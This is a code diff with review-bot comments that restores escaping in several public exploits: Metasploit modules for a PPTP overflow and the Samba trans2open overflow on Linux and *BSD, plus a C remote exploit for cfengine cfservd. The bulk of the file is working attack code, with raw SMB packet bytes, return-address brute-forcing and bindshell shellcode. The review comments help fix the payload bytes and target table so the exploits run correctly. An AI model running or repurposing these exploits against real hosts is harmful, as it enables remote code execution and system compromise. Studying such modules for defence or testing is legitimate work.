||||
OptString.new("Hostname", [ false, "PPTP Packet hostname", '' ]),
|
||||
OptString.new("Vendor", [ true, "PPTP Packet vendor", 'Microsoft Windows NT' ]),
|
||||
], self.class)
|
||||
end
|
||||
|
||||
# Dynamic payload space calculation
|
||||
def payload_space(explicit_target = nil)
|
||||
datastore[\'PreReturnLength\'].to_i + datastore[\'ExtraSpace\'].to_i
|
||||
datastore['PreReturnLength'].to_i + datastore['ExtraSpace'].to_i
|
||||
end
|
||||
|
||||
def build_packet(length)
|
||||
[length, 1, 0x1a2b3c4d, 1, 0].pack(\'nnNnn\') +
|
||||
[1,0].pack(\'cc\') +
|
||||
[0].pack(\'n\') +
|
||||
[1,1,0,2600].pack(\'NNnn\') +
|
||||
datastore[\'Hostname\'].ljust(64, \"\\x00\") +
|
||||
datastore[\'Vendor\'].ljust(64, \"\\x00\")
|
||||
[length, 1, 0x1a2b3c4d, 1, 0].pack('nnNnn') +
|
||||
[1,0].pack('cc') +
|
||||
[0].pack('n') +
|
||||
[1,1,0,2600].pack('NNnn') +
|
||||
datastore['Hostname'].ljust(64, "\x00") +
|
||||
datastore['Vendor'].ljust(64, "\x00")
|
||||
end
|
||||
|
||||
def check
|
||||
|
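Review bot: the old `doesn\'t` and `I\'ve` sat inside a double-quoted Ruby string, where `\'` is already a valid escape for `'`, so that part of the change is semantically a no-op; the `ljust(64, "\\x00")` to `ljust(64, "\x00")` change in `build_packet` is not, because the stored form padded the Hostname and Vendor fields with a backslash followed by `x00` text rather than NUL bytes. Worth confirming after the change that the two fields are 64 bytes each and NUL-padded.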
@ -114,13 +114,13 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
def brute_exploit(addrs)
|
||||
connect
|
||||
|
||||
print_status(\"Trying #{\"%.8x\" % addrs[\'Ret\']}...\")
|
||||
print_status("Trying #{"%.8x" % addrs['Ret']}...")
|
||||
|
||||
# Construct the evil length packet
|
||||
packet =
|
||||
build_packet(1) +
|
||||
payload.encoded +
|
||||
([addrs[\'Ret\']].pack(\'V\') * (datastore[\'RetLength\'] / 4))
|
||||
([addrs['Ret']].pack('V') * (datastore['RetLength'] / 4))
|
||||
|
||||
sock.put(packet)
|
||||
|
||||
|
|
|
@ -9,7 +9,7 @@
|
|||
# http://metasploit.com/framework/
|
||||
##
|
||||
|
||||
require \'msf/core\'
|
||||
require 'msf/core'
|
||||
|
||||
class Metasploit3 < Msf::Exploit::Remote
|
||||
Rank = GreatRanking
|
||||
|
@ -19,8 +19,8 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
|
||||
def initialize(info = {})
|
||||
super(update_info(info,
|
||||
\'Name\' => \'Samba trans2open Overflow (Linux x86)\',
|
||||
\'Description\' => %q{
|
||||
'Name' => 'Samba trans2open Overflow (Linux x86)',
|
||||
'Description' => %q{
|
||||
This exploits the buffer overflow found in Samba versions
|
||||
2.2.0 to 2.2.8. This particular module is capable of
|
||||
exploiting the flaw on x86 Linux systems that do not
|
||||
|
@ -29,45 +29,45 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
NOTE: Some older versions of RedHat do not seem to be vulnerable
|
||||
since they apparently do not allow anonymous access to IPC.
|
||||
},
|
||||
\'Author\' => [ \'hdm\', \'jduck\' ],
|
||||
\'License\' => MSF_LICENSE,
|
||||
\'Version\' => \'$Revision: 9828 $\',
|
||||
\'References\' =>
|
||||
'Author' => [ 'hdm', 'jduck' ],
|
||||
'License' => MSF_LICENSE,
|
||||
'Version' => '$Revision: 9828 $',
|
||||
'References' =>
|
||||
[
|
||||
[ \'CVE\', \'2003-0201\' ],
|
||||
[ \'OSVDB\', \'4469\' ],
|
||||
[ \'BID\', \'7294\' ],
|
||||
[ \'URL\', \'http://seclists.org/bugtraq/2003/Apr/103\' ]
|
||||
[ 'CVE', '2003-0201' ],
|
||||
[ 'OSVDB', '4469' ],
|
||||
[ 'BID', '7294' ],
|
||||
[ 'URL', 'http://seclists.org/bugtraq/2003/Apr/103' ]
|
||||
],
|
||||
\'Privileged\' => true,
|
||||
\'Payload\' =>
|
||||
'Privileged' => true,
|
||||
'Payload' =>
|
||||
{
|
||||
\'Space\' => 1024,
|
||||
\'BadChars\' => \"\\x00\",
|
||||
\'MinNops\' => 512,
|
||||
\'StackAdjustment\' => -3500
|
||||
'Space' => 1024,
|
||||
'BadChars' => "\x00",
|
||||
'MinNops' => 512,
|
||||
'StackAdjustment' => -3500
|
||||
},
|
||||
\'Platform\' => \'linux\',
|
||||
\'Targets\' =>
|
||||
'Platform' => 'linux',
|
||||
'Targets' =>
|
||||
[
|
||||
# tested OK - jjd:
|
||||
# RedHat 7.2 samba-2.2.1a-4 - 0xbffffafc
|
||||
# RedHat 9.0 samba-2.2.7a-7.9.0 - 0xbfffddfc
|
||||
[ \'Samba 2.2.x - Bruteforce\',
|
||||
[ 'Samba 2.2.x - Bruteforce',
|
||||
{
|
||||
\'PtrToNonZero\' => 0xbffffff4, # near the bottom of the stack
|
||||
\'Offset\' => 1055,
|
||||
\'Bruteforce\' =>
|
||||
'PtrToNonZero' => 0xbffffff4, # near the bottom of the stack
|
||||
'Offset' => 1055,
|
||||
'Bruteforce' =>
|
||||
{
|
||||
\'Start\' => { \'Ret\' => 0xbffffdfc },
|
||||
\'Stop\' => { \'Ret\' => 0xbfa00000 },
|
||||
\'Step\' => 256
|
||||
'Start' => { 'Ret' => 0xbffffdfc },
|
||||
'Stop' => { 'Ret' => 0xbfa00000 },
|
||||
'Step' => 256
|
||||
}
|
||||
}
|
||||
],
|
||||
],
|
||||
\'DefaultTarget\' => 0,
|
||||
\'DisclosureDate\' => \'Apr 7 2003\'
|
||||
'DefaultTarget' => 0,
|
||||
'DisclosureDate' => 'Apr 7 2003'
|
||||
))
|
||||
|
||||
register_options(
|
||||
|
@ -78,20 +78,20 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
|
||||
def brute_exploit(addrs)
|
||||
|
||||
curr_ret = addrs[\'Ret\']
|
||||
curr_ret = addrs['Ret']
|
||||
begin
|
||||
print_status(\"Trying return address 0x%.8x...\" % curr_ret)
|
||||
print_status("Trying return address 0x%.8x..." % curr_ret)
|
||||
|
||||
connect
|
||||
smb_login
|
||||
|
||||
if ! @checked_peerlm
|
||||
if smb_peer_lm !~ /samba/i
|
||||
raise RuntimeError, \"This target is not a Samba server (#{smb_peer_lm}\"
|
||||
raise RuntimeError, "This target is not a Samba server (#{smb_peer_lm}"
|
||||
end
|
||||
|
||||
if smb_peer_lm =~ /Samba [34]\\./i
|
||||
raise RuntimeError, \"This target is not a vulnerable Samba server (#{smb_peer_lm})\"
|
||||
if smb_peer_lm =~ /Samba [34]\./i
|
||||
raise RuntimeError, "This target is not a vulnerable Samba server (#{smb_peer_lm})"
|
||||
end
|
||||
end
|
||||
|
||||
|
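Review bot: the message `"This target is not a Samba server (#{smb_peer_lm}"` is missing the closing parenthesis that the second message in this hunk has; `"... (#{smb_peer_lm})"` makes them consistent. The `/Samba [34]\\./i` to `/Samba [34]\./i` change is correct: the stored form matched a literal backslash followed by any character instead of a dot.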
@ -99,7 +99,7 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
|
||||
|
||||
# This value *must* be 1988 to allow findrecv shellcode to work
|
||||
# XXX: I\'m not sure the above comment is true...
|
||||
# XXX: I'm not sure the above comment is true...
|
||||
pattern = rand_text_english(1988)
|
||||
|
||||
# See the OSX and Solaris versions of this module for additional
|
||||
|
@ -107,8 +107,8 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
|
||||
# eip_off = 1071 - RH7.2 compiled with -ggdb instead of -O/-O2
|
||||
# (rpmbuild -bp ; edited/reran config.status ; make)
|
||||
eip_off = target[\'Offset\']
|
||||
ptr_to_non_zero = target[\'PtrToNonZero\']
|
||||
eip_off = target['Offset']
|
||||
ptr_to_non_zero = target['PtrToNonZero']
|
||||
|
||||
# Stuff the shellcode into the request
|
||||
pattern[0, payload.encoded.length] = payload.encoded
|
||||
|
@ -119,7 +119,7 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
# 222 if (IS_IPC(conn)) {
|
||||
# 223 return(ERROR(ERRSRV,ERRaccess));
|
||||
# 224 }
|
||||
pattern[eip_off + 4, 4] = [ptr_to_non_zero - 0x30].pack(\'V\')
|
||||
pattern[eip_off + 4, 4] = [ptr_to_non_zero - 0x30].pack('V')
|
||||
|
||||
# We want to avoid crashing on the following two derefences.
|
||||
#
|
||||
|
@ -127,23 +127,23 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
# 117 {
|
||||
# 118 int outsize = set_message(outbuf,0,0,True);
|
||||
# 119 int cmd = CVAL(inbuf,smb_com);
|
||||
pattern[eip_off + 8, 4] = [ptr_to_non_zero - 0x08].pack(\'V\')
|
||||
pattern[eip_off + 12, 4] = [ptr_to_non_zero - 0x24].pack(\'V\')
|
||||
pattern[eip_off + 8, 4] = [ptr_to_non_zero - 0x08].pack('V')
|
||||
pattern[eip_off + 12, 4] = [ptr_to_non_zero - 0x24].pack('V')
|
||||
|
||||
# This stream covers the framepointer and the return address
|
||||
#pattern[1199, 400] = [curr_ret].pack(\'N\') * 100
|
||||
pattern[eip_off, 4] = [curr_ret].pack(\'V\')
|
||||
#pattern[1199, 400] = [curr_ret].pack('N') * 100
|
||||
pattern[eip_off, 4] = [curr_ret].pack('V')
|
||||
|
||||
trans =
|
||||
\"\\x00\\x04\\x08\\x20\\xff\\x53\\x4d\\x42\\x32\\x00\\x00\\x00\\x00\\x00\\x00\\x00\"+
|
||||
\"\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x01\\x00\\x00\\x00\"+
|
||||
\"\\x64\\x00\\x00\\x00\\x00\\xd0\\x07\\x0c\\x00\\xd0\\x07\\x0c\\x00\\x00\\x00\\x00\"+
|
||||
\"\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\xd0\\x07\\x43\\x00\\x0c\\x00\\x14\\x08\\x01\"+
|
||||
\"\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\"+
|
||||
\"\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x90\"+
|
||||
"\x00\x04\x08\x20\xff\x53\x4d\x42\x32\x00\x00\x00\x00\x00\x00\x00"+
|
||||
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00"+
|
||||
"\x64\x00\x00\x00\x00\xd0\x07\x0c\x00\xd0\x07\x0c\x00\x00\x00\x00"+
|
||||
"\x00\x00\x00\x00\x00\x00\x00\xd0\x07\x43\x00\x0c\x00\x14\x08\x01"+
|
||||
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"+
|
||||
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x90"+
|
||||
pattern
|
||||
|
||||
# puts \"press any key\"; $stdin.gets
|
||||
# puts "press any key"; $stdin.gets
|
||||
|
||||
sock.put(trans)
|
||||
handler
|
||||
|
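Review bot: this hunk is where the un-escaping actually changes behaviour. As stored, `"\\x00\\x04\\x08\\x20\\xff\\x53\\x4d\\x42..."` is a Ruby string of literal backslashes and `x00` text, so the `trans` header handed to `sock.put(trans)` would not have been an SMB header at all; the new `"\x00\x04\x08\x20\xff\x53\x4d\x42..."` form is the `\xffSMB` header the module intends. Since this pass only undoes doubled backslashes, any line that lost its backslash entirely is still wrong, so a byte-for-byte comparison against the upstream module is the real check here.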
@ -152,7 +152,7 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
rescue ::Rex::Proto::SMB::Exceptions::LoginError, ::Interrupt, ::RuntimeError
|
||||
raise $!
|
||||
rescue ::Exception => e
|
||||
print_error(\"#{rhost} #{e}\")
|
||||
print_error("#{rhost} #{e}")
|
||||
end
|
||||
|
||||
handler
|
||||
|
|
|
@ -9,7 +9,7 @@
|
|||
# http://metasploit.com/framework/
|
||||
##
|
||||
|
||||
require \'msf/core\'
|
||||
require 'msf/core'
|
||||
|
||||
class Metasploit3 < Msf::Exploit::Remote
|
||||
Rank = GreatRanking
|
||||
|
@ -19,51 +19,51 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
|
||||
def initialize(info = {})
|
||||
super(update_info(info,
|
||||
\'Name\' => \'Samba trans2open Overflow (*BSD x86)\',
|
||||
\'Description\' => %q{
|
||||
'Name' => 'Samba trans2open Overflow (*BSD x86)',
|
||||
'Description' => %q{
|
||||
This exploits the buffer overflow found in Samba versions
|
||||
2.2.0 to 2.2.8. This particular module is capable of
|
||||
exploiting the flaw on x86 Linux systems that do not
|
||||
have the noexec stack option set.
|
||||
},
|
||||
\'Author\' => [ \'hdm\', \'jduck\' ],
|
||||
\'License\' => MSF_LICENSE,
|
||||
\'Version\' => \'$Revision: 9552 $\',
|
||||
\'References\' =>
|
||||
'Author' => [ 'hdm', 'jduck' ],
|
||||
'License' => MSF_LICENSE,
|
||||
'Version' => '$Revision: 9552 $',
|
||||
'References' =>
|
||||
[
|
||||
[ \'CVE\', \'2003-0201\' ],
|
||||
[ \'OSVDB\', \'4469\' ],
|
||||
[ \'BID\', \'7294\' ],
|
||||
[ \'URL\', \'http://seclists.org/bugtraq/2003/Apr/103\' ]
|
||||
[ 'CVE', '2003-0201' ],
|
||||
[ 'OSVDB', '4469' ],
|
||||
[ 'BID', '7294' ],
|
||||
[ 'URL', 'http://seclists.org/bugtraq/2003/Apr/103' ]
|
||||
],
|
||||
\'Privileged\' => true,
|
||||
\'Payload\' =>
|
||||
'Privileged' => true,
|
||||
'Payload' =>
|
||||
{
|
||||
\'Space\' => 1024,
|
||||
\'BadChars\' => \"\\x00\",
|
||||
\'MinNops\' => 512,
|
||||
\'StackAdjustment\' => -3500
|
||||
'Space' => 1024,
|
||||
'BadChars' => "\x00",
|
||||
'MinNops' => 512,
|
||||
'StackAdjustment' => -3500
|
||||
},
|
||||
\'Platform\' => \'bsd\',
|
||||
\'Targets\' =>
|
||||
'Platform' => 'bsd',
|
||||
'Targets' =>
|
||||
[
|
||||
# tested OK - jjd:
|
||||
# FreeBSD 5.0-RELEASE samba-2.2.7a.tbz md5:cc477378829309d9560b136ca11a89f8
|
||||
[ \'Samba 2.2.x - Bruteforce\',
|
||||
[ 'Samba 2.2.x - Bruteforce',
|
||||
{
|
||||
\'PtrToNonZero\' => 0xbfbffff4, # near the bottom of the stack
|
||||
\'Offset\' => 1055,
|
||||
\'Bruteforce\' =>
|
||||
'PtrToNonZero' => 0xbfbffff4, # near the bottom of the stack
|
||||
'Offset' => 1055,
|
||||
'Bruteforce' =>
|
||||
{
|
||||
\'Start\' => { \'Ret\' => 0xbfbffdfc },
|
||||
\'Stop\' => { \'Ret\' => 0xbfa00000 },
|
||||
\'Step\' => 256
|
||||
'Start' => { 'Ret' => 0xbfbffdfc },
|
||||
'Stop' => { 'Ret' => 0xbfa00000 },
|
||||
'Step' => 256
|
||||
}
|
||||
}
|
||||
],
|
||||
],
|
||||
\'DefaultTarget\' => 0,
|
||||
\'DisclosureDate\' => \'Apr 7 2003\'
|
||||
'DefaultTarget' => 0,
|
||||
'DisclosureDate' => 'Apr 7 2003'
|
||||
))
|
||||
|
||||
register_options(
|
||||
|
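Review bot: the `Description` of this *BSD module still says "exploiting the flaw on x86 Linux systems that do not have the noexec stack option set" although `'Platform' => 'bsd'` and the tested target comment names FreeBSD 5.0-RELEASE; a pre-existing copy-paste from the Linux module, but since the file is being rewritten anyway the description could say *BSD. The quote un-escaping is correct throughout the hunk.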
@ -74,15 +74,15 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
|
||||
def brute_exploit(addrs)
|
||||
|
||||
curr_ret = addrs[\'Ret\']
|
||||
curr_ret = addrs['Ret']
|
||||
begin
|
||||
print_status(\"Trying return address 0x%.8x...\" % curr_ret)
|
||||
print_status("Trying return address 0x%.8x..." % curr_ret)
|
||||
|
||||
connect
|
||||
smb_login
|
||||
|
||||
# This value *must* be 1988 to allow findrecv shellcode to work
|
||||
# XXX: I\'m not sure the above comment is true...
|
||||
# XXX: I'm not sure the above comment is true...
|
||||
pattern = rand_text_english(1988)
|
||||
|
||||
# See the OSX and Solaris versions of this module for additional
|
||||
|
@ -90,8 +90,8 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
|
||||
# eip_off = 1071 - RH7.2 compiled with -ggdb instead of -O/-O2
|
||||
# (rpmbuild -bp ; edited/reran config.status ; make)
|
||||
eip_off = target[\'Offset\']
|
||||
ptr_to_non_zero = target[\'PtrToNonZero\']
|
||||
eip_off = target['Offset']
|
||||
ptr_to_non_zero = target['PtrToNonZero']
|
||||
|
||||
# Stuff the shellcode into the request
|
||||
pattern[0, payload.encoded.length] = payload.encoded
|
||||
|
@ -102,7 +102,7 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
# 222 if (IS_IPC(conn)) {
|
||||
# 223 return(ERROR(ERRSRV,ERRaccess));
|
||||
# 224 }
|
||||
pattern[eip_off + 4, 4] = [ptr_to_non_zero - 0x30].pack(\'V\')
|
||||
pattern[eip_off + 4, 4] = [ptr_to_non_zero - 0x30].pack('V')
|
||||
|
||||
# We want to avoid crashing on the following two derefences.
|
||||
#
|
||||
|
@ -110,23 +110,23 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
# 117 {
|
||||
# 118 int outsize = set_message(outbuf,0,0,True);
|
||||
# 119 int cmd = CVAL(inbuf,smb_com);
|
||||
pattern[eip_off + 8, 4] = [ptr_to_non_zero - 0x08].pack(\'V\')
|
||||
pattern[eip_off + 12, 4] = [ptr_to_non_zero - 0x24].pack(\'V\')
|
||||
pattern[eip_off + 8, 4] = [ptr_to_non_zero - 0x08].pack('V')
|
||||
pattern[eip_off + 12, 4] = [ptr_to_non_zero - 0x24].pack('V')
|
||||
|
||||
# This stream covers the framepointer and the return address
|
||||
#pattern[1199, 400] = [curr_ret].pack(\'N\') * 100
|
||||
pattern[eip_off, 4] = [curr_ret].pack(\'V\')
|
||||
#pattern[1199, 400] = [curr_ret].pack('N') * 100
|
||||
pattern[eip_off, 4] = [curr_ret].pack('V')
|
||||
|
||||
trans =
|
||||
\"\\x00\\x04\\x08\\x20\\xff\\x53\\x4d\\x42\\x32\\x00\\x00\\x00\\x00\\x00\\x00\\x00\"+
|
||||
\"\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x01\\x00\\x00\\x00\"+
|
||||
\"\\x64\\x00\\x00\\x00\\x00\\xd0\\x07\\x0c\\x00\\xd0\\x07\\x0c\\x00\\x00\\x00\\x00\"+
|
||||
\"\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\xd0\\x07\\x43\\x00\\x0c\\x00\\x14\\x08\\x01\"+
|
||||
\"\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\"+
|
||||
\"\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x90\"+
|
||||
"\x00\x04\x08\x20\xff\x53\x4d\x42\x32\x00\x00\x00\x00\x00\x00\x00"+
|
||||
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00"+
|
||||
"\x64\x00\x00\x00\x00\xd0\x07\x0c\x00\xd0\x07\x0c\x00\x00\x00\x00"+
|
||||
"\x00\x00\x00\x00\x00\x00\x00\xd0\x07\x43\x00\x0c\x00\x14\x08\x01"+
|
||||
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"+
|
||||
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x90"+
|
||||
pattern
|
||||
|
||||
# puts \"press any key\"; $stdin.gets
|
||||
# puts "press any key"; $stdin.gets
|
||||
|
||||
sock.put(trans)
|
||||
handler
|
||||
|
@ -134,7 +134,7 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
|
||||
rescue EOFError
|
||||
rescue => e
|
||||
print_error(\"#{e}\")
|
||||
print_error("#{e}")
|
||||
end
|
||||
|
||||
end
|
||||
|
|
|
@ -4,7 +4,7 @@ cfengine is prone to a stack-based buffer overrun vulnerability. This issue may
|
|||
|
||||
The vulnerability may be exploited to execute arbitrary code with the privileges of cfservd. A denial of service may also be the result of exploitation attempts as cfservd is multi-threaded and may not be configured to restart itself via a super-server such as inetd.
|
||||
|
||||
/*********************************************************************************\\
|
||||
/*********************************************************************************\
|
||||
|
||||
* jsk / cfengine2-2.0.3 from redhat
|
||||
|
||||
|
@ -16,7 +16,7 @@ The vulnerability may be exploited to execute arbitrary code with the privileges
|
|||
|
||||
* DSR-cfengine.pl :) i think it has some bugs.maybe it is only public
|
||||
* version...... possbile another reasns.....
|
||||
* the begin buf of exploit could be like \"111111\". so....DSR...
|
||||
* the begin buf of exploit could be like "111111". so....DSR...
|
||||
* by jsk from Ph4nt0m Security Team
|
||||
|
||||
* jsk@ph4nt0m.net chat with us ( irc.0x557.org #ph4nt0m)
|
||||
|
@ -50,7 +50,7 @@ The vulnerability may be exploited to execute arbitrary code with the privileges
|
|||
|
||||
|
||||
|
||||
\\*********************************************************************************/
|
||||
\*********************************************************************************/
|
||||
|
||||
|
||||
|
||||
|
@ -72,7 +72,7 @@ The vulnerability may be exploited to execute arbitrary code with the privileges
|
|||
|
||||
#define D_PORT 5803
|
||||
|
||||
#define D_HOST \"www.ph4nt0m.net\"
|
||||
#define D_HOST "www.ph4nt0m.net"
|
||||
|
||||
#define TIMEOUT 10
|
||||
|
||||
|
@ -80,18 +80,18 @@ The vulnerability may be exploited to execute arbitrary code with the privileges
|
|||
|
||||
char shell[]= /* bindshell(26112)&, netric. */
|
||||
|
||||
\"\\x90\\x90\\x90\\x31\\xdb\\xf7\\xe3\\x53\\x43\\x53\"
|
||||
\"\\x6a\\x02\\x89\\xe1\\xb0\\x66\\x52\"
|
||||
\"\\x50\\xcd\\x80\\x43\\x66\\x53\\x89\"
|
||||
\"\\xe1\\x6a\\x10\\x51\\x50\\x89\\xe1\"
|
||||
\"\\x52\\x50\\xb0\\x66\\xcd\\x80\\x89\"
|
||||
\"\\xe1\\xb3\\x04\\xb0\\x66\\xcd\\x80\"
|
||||
\"\\x43\\xb0\\x66\\xcd\\x80\\x89\\xd9\"
|
||||
\"\\x93\\xb0\\x3f\\xcd\\x80\\x49\\x79\"
|
||||
\"\\xf9\\x52\\x68\\x6e\\x2f\\x73\\x68\"
|
||||
\"\\x68\\x2f\\x2f\\x62\\x69\\x89\\xe3\"
|
||||
\"\\x52\\x53\\x89\\xe1\\xb0\\x0b\\xcd\"
|
||||
\"\\x80\";
|
||||
"\x90\x90\x90\x31\xdb\xf7\xe3\x53\x43\x53"
|
||||
"\x6a\x02\x89\xe1\xb0\x66\x52"
|
||||
"\x50\xcd\x80\x43\x66\x53\x89"
|
||||
"\xe1\x6a\x10\x51\x50\x89\xe1"
|
||||
"\x52\x50\xb0\x66\xcd\x80\x89"
|
||||
"\xe1\xb3\x04\xb0\x66\xcd\x80"
|
||||
"\x43\xb0\x66\xcd\x80\x89\xd9"
|
||||
"\x93\xb0\x3f\xcd\x80\x49\x79"
|
||||
"\xf9\x52\x68\x6e\x2f\x73\x68"
|
||||
"\x68\x2f\x2f\x62\x69\x89\xe3"
|
||||
"\x52\x53\x89\xe1\xb0\x0b\xcd"
|
||||
"\x80";
|
||||
struct op_plat_st
|
||||
|
||||
{
|
||||
|
@ -112,15 +112,15 @@ struct op_plat_st __pl_form[]=
|
|||
|
||||
|
||||
|
||||
{0,\"red 8.0\",0x4029cc2c,0},
|
||||
{0,"red 8.0",0x4029cc2c,0},
|
||||
|
||||
{1,\"red 9.0(cmp)\",0x4029cda0,0},
|
||||
{1,"red 9.0(cmp)",0x4029cda0,0},
|
||||
|
||||
|
||||
|
||||
{2,\"red 7.2 (Compile)\",0x44444444,0},
|
||||
{2,"red 7.2 (Compile)",0x44444444,0},
|
||||
|
||||
{3,\"red 7.3 (Compile)\",0x44444444,0},
|
||||
{3,"red 7.3 (Compile)",0x44444444,0},
|
||||
|
||||
NULL
|
||||
|
||||
|
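Review bot: the bare `NULL` that terminates `__pl_form[]` is an element initializer without braces, so it only sets the first member (`op_plat_num`, an int) of a zero-filled trailing entry and draws a pointer-to-integer warning; `{0, NULL, 0, 0}` states the same sentinel explicitly (the remaining members are zero-initialised either way, so a loop stopping on a null `op_plat_sys` still works). The quote un-escaping of the four platform names is correct.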
@ -136,17 +136,17 @@ void getshell(char *,unsigned short);
|
|||
|
||||
void printe(char *,short);
|
||||
|
||||
void sig_alarm(){printe(\"alarm/timeout hit.\",1);}
|
||||
void sig_alarm(){printe("alarm/timeout hit.",1);}
|
||||
|
||||
void banrl()
|
||||
|
||||
{
|
||||
|
||||
fprintf(stdout,\"\\n cfengine2-2.0.3:server remote buffer overflow exploit)\\n\");
|
||||
fprintf(stdout,"\n cfengine2-2.0.3:server remote buffer overflow exploit)\n");
|
||||
|
||||
fprintf(stdout,\" by jsk.\\n\");
|
||||
fprintf(stdout," by jsk.\n");
|
||||
|
||||
fprintf(stdout,\" Greets Br-00t and all #ph4nt0m .\\n\");
|
||||
fprintf(stdout," Greets Br-00t and all #ph4nt0m .\n");
|
||||
|
||||
}
|
||||
|
||||
|
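Review bot: the banner `"\n cfengine2-2.0.3:server remote buffer overflow exploit)\n"` has a stray closing parenthesis with no opening one; cosmetic, but the file is being rewritten anyway. The `\\n` to `\n` restoration in the three `fprintf` calls is correct.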
@ -158,17 +158,17 @@ void x_fp_rm_usage(char *x_fp_rm)
|
|||
|
||||
int __t_xmp=0;
|
||||
|
||||
fprintf(stdout,\"\\n Usage: %s -[option] [arguments]\\n\\n\",x_fp_rm);
|
||||
fprintf(stdout,"\n Usage: %s -[option] [arguments]\n\n",x_fp_rm);
|
||||
|
||||
fprintf(stdout,\"\\t -h [hostname] - target host.\\n\");
|
||||
fprintf(stdout,"\t -h [hostname] - target host.\n");
|
||||
|
||||
fprintf(stdout,\"\\t -p [port] - port number.\\n\");
|
||||
fprintf(stdout,"\t -p [port] - port number.\n");
|
||||
|
||||
fprintf(stdout,\"\\t -s [addr] - &shellcode address.\\n\\n\");
|
||||
fprintf(stdout,"\t -s [addr] - &shellcode address.\n\n");
|
||||
|
||||
fprintf(stdout,\" Example> %s -h target_hostname -p 8000 -t num\\n\",x_fp_rm);
|
||||
fprintf(stdout," Example> %s -h target_hostname -p 8000 -t num\n",x_fp_rm);
|
||||
|
||||
fprintf(stdout,\" Select target number>\\n\\n\");
|
||||
fprintf(stdout," Select target number>\n\n");
|
||||
|
||||
for(;;)
|
||||
|
||||
|
@ -182,7 +182,7 @@ else
|
|||
|
||||
{
|
||||
|
||||
fprintf(stdout,\"\\t {%d} %s\\n\",__pl_form[__t_xmp].op_plat_num,__pl_form[__t_xmp].op_plat_sys);
|
||||
fprintf(stdout,"\t {%d} %s\n",__pl_form[__t_xmp].op_plat_num,__pl_form[__t_xmp].op_plat_sys);
|
||||
|
||||
}
|
||||
|
||||
|
@ -190,7 +190,7 @@ __t_xmp++;
|
|||
|
||||
}
|
||||
|
||||
fprintf(stdout,\"\\n\");
|
||||
fprintf(stdout,"\n");
|
||||
exit(0);
|
||||
}
|
||||
|
||||
|
@ -218,7 +218,7 @@ u_long retaddr=__pl_form[type].retaddr;
|
|||
|
||||
(void)banrl();
|
||||
|
||||
while((whlp=getopt(argc,argv,\"T:t:H:h:P:p:IiXx\"))!=EOF)
|
||||
while((whlp=getopt(argc,argv,"T:t:H:h:P:p:IiXx"))!=EOF)
|
||||
|
||||
{
|
||||
|
||||
|
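Review bot: the `getopt` option string `"T:t:H:h:P:p:IiXx"` has no `s:` entry, yet the usage text in this file advertises `-s [addr] - &shellcode address`; either add `s:` with a case that overrides `retaddr`, or drop `-s` from the usage text so the two agree. Pre-existing, not introduced by the quote change.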
@ -228,9 +228,9 @@ switch(whlp)
|
|||
|
||||
{
|
||||
|
||||
case \'T\':
|
||||
case 'T':
|
||||
|
||||
case \'t\':
|
||||
case 't':
|
||||
|
||||
if((type=atoi(optarg))<6)
|
||||
|
||||
|
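Review bot: `if((type=atoi(optarg))<6)` accepts target numbers 4 and 5, but `__pl_form[]` defines only entries 0 to 3 before its terminator, so `-t 4` selects the all-zero sentinel (return address 0) and `-t 5` indexes past the end of the table when `__pl_form[type].retaddr` is read. The bound should be `<4`, or better, derived from the table size.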
@ -248,9 +248,9 @@ break;
|
|||
|
||||
|
||||
|
||||
case \'H\':
|
||||
case 'H':
|
||||
|
||||
case \'h\':
|
||||
case 'h':
|
||||
|
||||
memset((char *)hostname,0,sizeof(hostname));
|
||||
|
||||
|
@ -260,9 +260,9 @@ break;
|
|||
|
||||
|
||||
|
||||
case \'P\':
|
||||
case 'P':
|
||||
|
||||
case \'p\':
|
||||
case 'p':
|
||||
|
||||
port=atoi(optarg);
|
||||
|
||||
|
@ -270,17 +270,17 @@ break;
|
|||
|
||||
|
||||
|
||||
case \'I\':
|
||||
case 'I':
|
||||
|
||||
case \'i\':
|
||||
case 'i':
|
||||
|
||||
fprintf(stderr,\" Try `%s -?\' for more information.\\n\\n\",argv[0]);
|
||||
fprintf(stderr," Try `%s -?' for more information.\n\n",argv[0]);
|
||||
|
||||
exit(-1);
|
||||
|
||||
|
||||
|
||||
case \'?\':
|
||||
case '?':
|
||||
|
||||
(void)x_fp_rm_usage(argv[0]);
|
||||
|
||||
|
@ -302,35 +302,35 @@ if(!strcmp(hostname,D_HOST))
|
|||
|
||||
{
|
||||
|
||||
fprintf(stdout,\" [+] Hostname: %s\\n\",hostname);
